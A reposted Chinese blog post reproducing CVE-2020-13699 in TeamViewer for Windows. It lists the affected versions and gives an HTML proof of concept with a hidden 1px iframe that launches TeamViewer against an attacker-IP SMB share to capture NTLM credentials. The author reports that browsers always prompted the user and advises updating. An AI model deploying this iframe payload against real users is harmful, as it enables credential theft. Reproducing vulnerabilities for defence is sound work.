转载:Windows版TeamViewer漏洞复现

摘要

Windows版TeamViewer被暴高风险漏洞,可能被远程攻击者利用来破解用户的密码,从而导致进一步的系统利用。

TeamViewer 官方发布漏洞修复消息

TeamViewer是一个可用于Microsoft Windows、macOS、Linux、Chrome OS、iOS、Android、Windows RT、Windows Phone 8和黑莓操作系统等的远程控制软件。除了远程控制外,TeamViewer还包含合同协作与示范等功能。

近日TeamViewer团队发布了8-15的全版本的软件推送,在官方发布的安全公告中,修复了CVE-2020-13699漏洞。该漏洞使得程序无法正确引用其自定义URI处理程序,导致攻击者可以通过构建恶意的URI,通过精心制作URL将恶意的iframe嵌入到网页中。

<iframe src='teamviewer10: --play \\attacker-IP\share\fake.tvs'></iframe>

根据安全研究人员 Jeffrey Hofmann的描述,该恶意的iframe会启动系统的TeamViewer,并启动SMB的共享,从而触发一个SMB认证攻击(Windows在打开SMB共享时将执行NTLM身份验证,并且可以将请求进行转发),攻击者可以利用窃取到的凭证对受害者主机和网络资源进行认证。

危害版本

根据安全研究人员的分析受到漏洞影响的版本如下:

TeamViewer8 < 8.0.258861
TeamViewer9 < 9.0.258860
TeamViewer10 < 10.0.258873
TeamViewer11 < 11.0.258870
TeamViewer12 < 12.0.258869
TeamViewer13 < 13.2.36220
TeamViewer14 < 14.2.56676, 14.7.48350
TeamViewer15 < 15.8.3

漏洞复现

构建用户不能轻易察觉的iframe,所以将恶意的iframe的大小设置成1px*1px,

<!DOCTYPE html>
<html>
<head>
    <title>cve-2020-13699</title>
</head>

<body>
    <p>Welcome to ChaMd5!</p>
    <iframe style="height:1px;width:1px;" src='teamviewer10: --play \\attacker-IP\share\fake.tvs'></iframe>
</body>
</html>

根据精心构建的iframe后,本人分别在Windows7/Windows10平台使用IE8/Chrome84/Edge浏览器,同时使用TeamViewer8/10/14/15进行复现,但是当用户访问攻击者主恶意构建的URI时,浏览器并不会后台静默启动TeamViewer,而是会提示当前用户远端启动应用的通知。
在这里插入图片描述

本人经过多次实验并未发现不提示用户而静默启动的情况出现,即当应用启动时,用户一定可以收到远端启动应用的通知,所以本人认为在用户不误操作的情况下可以拒绝恶意启动的TeamViewer应用。

修复建议

根据官方声明,现已发布修复该漏洞的最新版本,请大家及时更新到TeamViewer的最新版本。

参考链接

https://nvd.nist.gov/vuln/detail/CVE-2020-13699
https://community.teamviewer.com/t5/Announcements/Statement-on-CVE-2020-13699/td-p/98448
https://jeffs.sh/CVEs/CVE-2020-13699.txt
https://www.helpnetsecurity.com/2020/08/06/cve-2020-13699/
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值